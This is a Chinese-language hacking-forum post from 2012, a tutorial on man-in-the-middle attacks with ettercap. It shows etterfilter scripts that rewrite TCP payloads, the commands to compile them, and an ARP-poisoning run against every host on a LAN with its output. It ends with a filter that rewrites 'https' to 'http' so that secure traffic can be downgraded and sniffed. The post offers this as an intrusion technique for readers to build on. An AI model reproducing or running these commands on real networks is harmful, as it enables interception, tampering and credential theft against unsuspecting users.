切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
45 中间人攻击 ettercap : etterfilter[复制链接]
发表于 2012-8-18 00:58:41 | 显示全部楼层 |!read_mode!
介绍

ettercap是LINUX下一个强大的欺骗工具,当然WINDOWS也能用,你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配 器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模 式里才能用)
下面我们来说说咋吧数据插进去
首先你得有自己个规则,默认的ETTERCAP自带了几个


  1. root@Dis9Team:/usr/share/ettercap$ ls
  2. ettercap.png  etterfilter.cnt        etterfilter.tbl   etter.mime
  3. etter.dns     etter.filter.examples  etter.finger.mac  etter.services
  4. etter.fields  etter.filter.kill      etter.finger.os   etter.ssl.crt
  5. etter.filter  etter.filter.ssh       etterlog.dtd
  6. brk@Dis9Team:/usr/share/ettercap$
复制代码

简单利用在入侵过程种,这些达不到我们想要的,来看这个规则

  1. root@Dis9Team:~/arp# cat 1
  2. if (ip.proto == TCP && search(DATA.data, "oo") ) {
  3.    log(DATA.data, "/tmp/mispelled_ettercap.log");
  4.    replace("oo", "xx");
  5.    msg("Correctly substituted and logged.\n");
  6. }
  7. root@Dis9Team:~/arp#
复制代码
很简单,搜索全部TCP协议中包含的OO,替换成CC
我们编译执行
  1. root@Dis9Team:~/arp# etterfilter 1 -o 1.ef

  2. etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


  3. 12 protocol tables loaded:
  4.         DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

  5. 11 constants loaded:
  6.         VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

  7. Parsing source file '1'  done.

  8. Unfolding the meta-tree  done.

  9. Converting labels to real offsets  done.

  10. Writing output to '1.ef'  done.

  11. -> Script encoded into 8 instructions.
复制代码


进行ARP
  1. root@Dis9Team:~/arp# ettercap -T -q -M arp:remote -F 1.ef // //

  2. ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

  3. Content filters loaded from 1.ef...
  4. Listening on eth0... (Ethernet)

  5.   eth0 ->        00:0C:29:84:4C:9D    192.168.40.128     255.255.255.0

  6. SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
  7. Privileges dropped to UID 65534 GID 65534...

  8.   28 plugins
  9.   39 protocol dissectors
  10.   53 ports monitored
  11. 7587 mac vendor fingerprint
  12. 1698 tcp OS fingerprint
  13. 2183 known services

  14. Randomizing 255 hosts for scanning...
  15. Scanning the whole netmask for 255 hosts...
  16. * |==================================================>| 100.00 %

  17. 4 hosts added to the hosts list...

  18. ARP poisoning victims:

  19. GROUP 1 : ANY (all the hosts in the list)

  20. GROUP 2 : ANY (all the hosts in the list)
  21. Starting Unified sniffing...


  22. Text only Interface activated...
  23. Hit 'h' for inline help

  24. Correctly substituted and logged.
  25. Correctly substituted and logged.
  26. Correctly substituted and logged.
  27. Correctly substituted and logged.
  28. Correctly substituted and logged.
  29. DHCP: [00:0C:29:EB:F8:94] REQUEST 192.168.40.129
  30. DHCP: [192.168.40.254] ACK : 192.168.40.129 255.255.255.0 GW 192.168.40.2 DNS 192.168.40.2 "localdomain"
复制代码


当被ARP的机子的任意TCP协议的OO内容 会被替换成XX..我打开了GOOGLE.COM 结果..


有什么用?在某些情况下 HTTPS默认不能被嗅探,我们可以这样:
  1. if (ip.proto == TCP && search(DATA.data, "https") ) {
  2.    log(DATA.data, "/tmp/mispelled_ettercap.log");
  3.    replace("https", "http");
  4.    msg("Correctly substituted and logged.\n");
  5. }
复制代码



恩 都能看懂吧? 等待你的发挥 分享到:http://fuzzexp.org/tech/viewthread.php?tid=97&extra=



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-3 02:53

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部